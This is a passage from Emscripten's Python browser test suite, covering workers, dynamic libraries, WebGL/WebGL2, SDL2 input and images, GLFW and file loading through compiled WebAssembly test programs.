create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'] + self.get_async_args())
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.run_process([EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure', '1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(path_from_root('tests', 'test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(path_from_root('tests', 'browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS=1'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'],
['-s', 'OFFSCREEN_FRAMEBUFFER=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT=1' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(path_from_root('tests', 'html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest(path_from_root('tests', 'test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(path_from_root('tests', 'webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=self.get_async_args())
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2'] + self.get_async_args())
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION=1'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS=1', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([path_from_root('tests', 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
